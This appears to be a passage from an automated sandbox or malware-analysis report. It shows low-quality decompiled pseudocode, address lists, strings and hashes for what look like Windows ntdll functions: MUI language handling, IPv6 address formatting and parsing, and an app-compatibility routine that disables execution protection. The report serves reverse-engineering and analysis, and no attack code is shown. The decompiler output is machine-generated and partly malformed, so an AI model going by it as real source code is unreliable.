							if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00A2718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A0E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A02340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00A1E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A0E2A8(_v12,  &_v68, _v16);
						if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00A1E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A0E2A8(_t322,  &_v68, _t296);
						if(E00A25553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A0E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                      0x00a28788
                                                      0x00a28788
                                                      0x00a28791
                                                      0x00a28794
                                                      0x00a28798
                                                      0x00a2879b
                                                      0x00a2879e
                                                      0x00a287a1
                                                      0x00a287a4
                                                      0x00a287a7
                                                      0x00a287aa
                                                      0x00a287af
                                                      0x00a71ad3
                                                      0x00a28b0a
                                                      0x00a28b0d
                                                      0x00a28b13
                                                      0x00a28b19
                                                      0x00a28b1f
                                                      0x00a28b25
                                                      0x00a28b2b
                                                      0x00a28b31
                                                      0x00a28b37
                                                      0x00a28b3d
                                                      0x00a28b46
                                                      0x00a28b46
                                                      0x00a287c6
                                                      0x00a287d0
                                                      0x00a71ae0
                                                      0x00a71ae6
                                                      0x00a71af8
                                                      0x00a71af8
                                                      0x00a71afd
                                                      0x00a71afe
                                                      0x00a71b01
                                                      0x00a71b06
                                                      0x00a71b06
                                                      0x00a287d6
                                                      0x00a287f2
                                                      0x00a287f7
                                                      0x00a28807
                                                      0x00a2880a
                                                      0x00a2880f
                                                      0x00a28810
                                                      0x00a28813
                                                      0x00a28818
                                                      0x00a28818
                                                      0x00a2882c
                                                      0x00a28831
                                                      0x00a28838
                                                      0x00a28908
                                                      0x00a28920
                                                      0x00a289f0
                                                      0x00a28a08
                                                      0x00a28af6
                                                      0x00a28af6
                                                      0x00a28af8
                                                      0x00a28afb
                                                      0x00a71beb
                                                      0x00a71beb
                                                      0x00a28b04
                                                      0x00a71bf8
                                                      0x00a71c0e
                                                      0x00a71c13
                                                      0x00a71c16
                                                      0x00a71c16
                                                      0x00a71bf8
                                                      0x00000000
                                                      0x00a28b04
                                                      0x00a28a0e
                                                      0x00a28a11
                                                      0x00a28a14
                                                      0x00a28a15
                                                      0x00a28a18
                                                      0x00a28a22
                                                      0x00a28b59
                                                      0x00a28a28
                                                      0x00a28a3c
                                                      0x00a28a3c
                                                      0x00a28a42
                                                      0x00a71bb0
                                                      0x00a71b11
                                                      0x00a71b11
                                                      0x00000000
                                                      0x00a28a48
                                                      0x00a28a51
                                                      0x00a28a5b
                                                      0x00a28a5e
                                                      0x00a28a61
                                                      0x00a28a69
                                                      0x00a28a69
                                                      0x00a28a6d
                                                      0x00000000
                                                      0x00000000
                                                      0x00a28a74
                                                      0x00a28a7c
                                                      0x00a28a7d
                                                      0x00a28a91
                                                      0x00a28a93
                                                      0x00a28a93
                                                      0x00a28a98
                                                      0x00a28a9b
                                                      0x00a28aa1
                                                      0x00a28aa1
                                                      0x00a28aa4
                                                      0x00a28aaa
                                                      0x00a28ab1
                                                      0x00a28ac5
                                                      0x00a28ac7
                                                      0x00a28ac7
                                                      0x00a28ac5
                                                      0x00a28ace
                                                      0x00a71bc9
                                                      0x00a71bce
                                                      0x00a71bd2
                                                      0x00a71bd2
                                                      0x00a28ad8
                                                      0x00a28aeb
                                                      0x00a28aeb
                                                      0x00a28af0
                                                      0x00a28af4
                                                      0x00000000
                                                      0x00a28af4
                                                      0x00a28a42
                                                      0x00a28926
                                                      0x00a28929
                                                      0x00a2892c
                                                      0x00a2892d
                                                      0x00a28930
                                                      0x00a28935
                                                      0x00a2893a
                                                      0x00a28b51
                                                      0x00a28940
                                                      0x00a28954
                                                      0x00a28954
                                                      0x00a2895a
                                                      0x00a71b63
                                                      0x00000000
                                                      0x00a28960
                                                      0x00a28969
                                                      0x00a28973
                                                      0x00a28976
                                                      0x00a28979
                                                      0x00a2897e
                                                      0x00a28981
                                                      0x00a28981
                                                      0x00a28986
                                                      0x00000000
                                                      0x00000000
                                                      0x00a71b6e
                                                      0x00a71b74
                                                      0x00a71b7b
                                                      0x00a71b8f
                                                      0x00a71b91
                                                      0x00a71b91
                                                      0x00a71b99
                                                      0x00a71b9c
                                                      0x00a71ba2
                                                      0x00a71ba2
                                                      0x00a2898c
                                                      0x00a28992
                                                      0x00a28999
                                                      0x00a289ad
                                                      0x00a71ba8
                                                      0x00a71ba8
                                                      0x00a289ad
                                                      0x00a289b6
                                                      0x00a289c8
                                                      0x00a289cd
                                                      0x00a289d0
                                                      0x00a289d0
                                                      0x00a289d6
                                                      0x00a289e8
                                                      0x00a289e8
                                                      0x00a289ed
                                                      0x00000000
                                                      0x00a289ed
                                                      0x00a2895a
                                                      0x00a2883e
                                                      0x00a28841
                                                      0x00a28844
                                                      0x00a28845
                                                      0x00a28848
                                                      0x00a2884d
                                                      0x00a28852
                                                      0x00a28b49
                                                      0x00a28858
                                                      0x00a2886c
                                                      0x00a2886c
                                                      0x00a28872
                                                      0x00a71b0e
                                                      0x00000000
                                                      0x00a28878
                                                      0x00a28881
                                                      0x00a2888b
                                                      0x00a2888e
                                                      0x00a28891
                                                      0x00a28896
                                                      0x00a28899
                                                      0x00a28899
                                                      0x00a2889e
                                                      0x00000000
                                                      0x00000000
                                                      0x00a71b21
                                                      0x00a71b27
                                                      0x00a71b2e
                                                      0x00a71b42
                                                      0x00a71b44
                                                      0x00a71b44
                                                      0x00a71b4c
                                                      0x00a71b4f
                                                      0x00a71b55
                                                      0x00a71b55
                                                      0x00a288a4
                                                      0x00a288aa
                                                      0x00a288b1
                                                      0x00a288c5
                                                      0x00a71b5b
                                                      0x00a71b5b
                                                      0x00a288c5
                                                      0x00a288ce
                                                      0x00a288e0
                                                      0x00a288e5
                                                      0x00a288e8
                                                      0x00a288e8
                                                      0x00a288ee
                                                      0x00a28900
                                                      0x00a28900
                                                      0x00a28905
                                                      0x00000000
                                                      0x00a28905

                                                      APIs
                                                      Strings
                                                      • Kernel-MUI-Language-SKU, xrefs: 00A289FC
                                                      • Kernel-MUI-Language-Allowed, xrefs: 00A28827
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 00A28914
                                                      • WindowsExcludedProcs, xrefs: 00A287C1
                                                      • Kernel-MUI-Number-Allowed, xrefs: 00A287E6
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: _wcspbrk
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 402402107-258546922
                                                      • Opcode ID: c9c9ec179aad099c43d39130170d434657862eb9623271d1cc944fe714be48b1
                                                      • Instruction ID: 503236c3e890c062753b3303cdb6cdf9fdf712f62648cd8bfc69079971de652b
                                                      • Opcode Fuzzy Hash: c9c9ec179aad099c43d39130170d434657862eb9623271d1cc944fe714be48b1
                                                      • Instruction Fuzzy Hash: 5BF1F7B2D00219EFCF11EF98DA819EEB7B8FF08300F14846AF505A7251EB359A45DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A413CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 38%
                                                      			E00A413CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00A37707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa02926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00A37707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa09cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00A37707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00A37707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00A37707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00A37707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                      0x00a413d5
                                                      0x00a413d9
                                                      0x00a413dc
                                                      0x00a413de
                                                      0x00a413e1
                                                      0x00a413e8
                                                      0x00a413ee
                                                      0x00a6e8fd
                                                      0x00000000
                                                      0x00a6e921
                                                      0x00a6e921
                                                      0x00a6e928
                                                      0x00a6e982
                                                      0x00a6e98a
                                                      0x00000000
                                                      0x00a6e99a
                                                      0x00a6e99e
                                                      0x00a6e9a3
                                                      0x00a6e9a8
                                                      0x00a6e9b9
                                                      0x00a6e978
                                                      0x00000000
                                                      0x00a6e978
                                                      0x00a6e98a
                                                      0x00a6e92a
                                                      0x00a6e931
                                                      0x00a6e944
                                                      0x00a6e944
                                                      0x00a6e950
                                                      0x00a6e954
                                                      0x00a6e959
                                                      0x00a6e95e
                                                      0x00a6e963
                                                      0x00a6e970
                                                      0x00000000
                                                      0x00a6e975
                                                      0x00a6e93b
                                                      0x00a6e980
                                                      0x00000000
                                                      0x00a6e980
                                                      0x00a6e942
                                                      0x00a6e94b
                                                      0x00000000
                                                      0x00a6e94b
                                                      0x00000000
                                                      0x00a6e942
                                                      0x00a413f4
                                                      0x00a413f4
                                                      0x00a413f9
                                                      0x00a413fc
                                                      0x00a413ff
                                                      0x00a41406
                                                      0x00a6e9cc
                                                      0x00a6e9d2
                                                      0x00a6e9d2
                                                      0x00a6e9cc
                                                      0x00a4140c
                                                      0x00a41411
                                                      0x00a41431
                                                      0x00a4143a
                                                      0x00a4143c
                                                      0x00a4143f
                                                      0x00a4143f
                                                      0x00a41442
                                                      0x00a41447
                                                      0x00a414a8
                                                      0x00a414ac
                                                      0x00a6e9e2
                                                      0x00a6e9e7
                                                      0x00a6e9ec
                                                      0x00a6ea05
                                                      0x00a6ea05
                                                      0x00000000
                                                      0x00a41449
                                                      0x00000000
                                                      0x00a41449
                                                      0x00a4144c
                                                      0x00a41459
                                                      0x00a41462
                                                      0x00a41469
                                                      0x00a4146a
                                                      0x00a41470
                                                      0x00a41473
                                                      0x00a41476
                                                      0x00a41476
                                                      0x00a41490
                                                      0x00a41495
                                                      0x00a4138e
                                                      0x00a41390
                                                      0x00a41397
                                                      0x00a41398
                                                      0x00a41399
                                                      0x00a413a1
                                                      0x00a413a4
                                                      0x00a413a4
                                                      0x00a41498
                                                      0x00a4149c
                                                      0x00a4149f
                                                      0x00a414a2
                                                      0x00000000
                                                      0x00000000
                                                      0x00a414a4
                                                      0x00000000
                                                      0x00a414a4
                                                      0x00a41413
                                                      0x00a41415
                                                      0x00a41416
                                                      0x00a41419
                                                      0x00a4141c
                                                      0x00a41422
                                                      0x00a413b7
                                                      0x00a413bc
                                                      0x00a413bf
                                                      0x00a413bf
                                                      0x00a413c2
                                                      0x00a41424
                                                      0x00a41424
                                                      0x00a41424
                                                      0x00a41427
                                                      0x00a4142b
                                                      0x00a4142c
                                                      0x00a4142c
                                                      0x00a4142c
                                                      0x00000000
                                                      0x00a4141c
                                                      0x00a41411

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
                                                      • Instruction ID: e1aa2b2cf0698a4e7c588b1044186aa14fb124dc3b19fd814b75ede9394aa804
                                                      • Opcode Fuzzy Hash: b16b0bea5005bea69a3bf7b0a6fb287ac22d3ffac5c6352282c5918b8a66998c
                                                      • Instruction Fuzzy Hash: 766127B9904655AACB34DF99C8808BFBBF5EFD4300B14C52DF5D647581D374AA80DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A37EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 64%
                                                      			E00A37EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xae2088; // 0x7663e5d0
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00A37F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00A53F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A0DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xae4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00A53F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00A10D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00A53F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00A18375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00A53F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00A7E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00A53F92();
					_t38 = 1;
					L2:
					return E00A0E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                      0x00a37f08
                                                      0x00a37f0f
                                                      0x00a37f12
                                                      0x00a37f1b
                                                      0x00a37f31
                                                      0x00a53ead
                                                      0x00a53eb4
                                                      0x00000000
                                                      0x00000000
                                                      0x00a53eba
                                                      0x00a53ecd
                                                      0x00a53ed2
                                                      0x00a53ee1
                                                      0x00a53ee7
                                                      0x00a53eec
                                                      0x00a53f12
                                                      0x00a53f18
                                                      0x00a53f1a
                                                      0x00000000
                                                      0x00000000
                                                      0x00a53f20
                                                      0x00a53f26
                                                      0x00a53f28
                                                      0x00000000
                                                      0x00000000
                                                      0x00a53f2e
                                                      0x00a53f30
                                                      0x00000000
                                                      0x00000000
                                                      0x00a53f3a
                                                      0x00a53f3b
                                                      0x00a53f53
                                                      0x00a53f64
                                                      0x00a53f69
                                                      0x00a53f6c
                                                      0x00a53f6d
                                                      0x00a53f6f
                                                      0x00a5e304
                                                      0x00a5e30f
                                                      0x00a5e315
                                                      0x00a5e31e
                                                      0x00a5e321
                                                      0x00a5e327
                                                      0x00a5e329
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00a5e32f
                                                      0x00a5e32f
                                                      0x00a5e337
                                                      0x00a5e33a
                                                      0x00a5e33b
                                                      0x00a5e33d
                                                      0x00a5e33f
                                                      0x00a5e341
                                                      0x00a5e341
                                                      0x00a5e34e
                                                      0x00a5e353
                                                      0x00a5e358
                                                      0x00a5e35d
                                                      0x00a5e35f
                                                      0x00000000
                                                      0x00000000
                                                      0x00a5e365
                                                      0x00a5e365
                                                      0x00a5e368
                                                      0x00a5e36e
                                                      0x00000000
                                                      0x00000000
                                                      0x00a5e374
                                                      0x00a5e32f
                                                      0x00a53f75
                                                      0x00a53f7a
                                                      0x00a53f7c
                                                      0x00a53f7e
                                                      0x00a53f86
                                                      0x00a37f39
                                                      0x00a37f47
                                                      0x00a37f47
                                                      0x00a37f37
                                                      0x00a37f37
                                                      0x00000000

                                                      APIs
                                                      • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A53F12
                                                      Strings
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A53EC4
                                                      • H'u, xrefs: 00A37F1E
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A53F4A
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A5E345
                                                      • ExecuteOptions, xrefs: 00A53F04
                                                      • Execute=1, xrefs: 00A53F5E
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A5E2FB
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A53F75
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: BaseDataModuleQuery
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$H'u
                                                      • API String ID: 3901378454-1000538930
                                                      • Opcode ID: 9d504fc12a46adb3beabcb99136cca8b3dcf1f93692dabe1d1dec537fb2d19a4
                                                      • Instruction ID: bcf8181ec82f7fa613407dd87d0071683dedaee3ec0dbeed21306069688623c8
                                                      • Opcode Fuzzy Hash: 9d504fc12a46adb3beabcb99136cca8b3dcf1f93692dabe1d1dec537fb2d19a4
                                                      • Instruction Fuzzy Hash: D2418672A8031C7ADF24DA94DCCAFEE73BCBB54701F0045A9B505A61C1EA709B49CF61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00A40B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00A40B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00A18980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A0DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00A40CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00A40CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00A406BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00A406BA(_t135, _t178) == 0 || E00A40A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00A40CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00A40CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
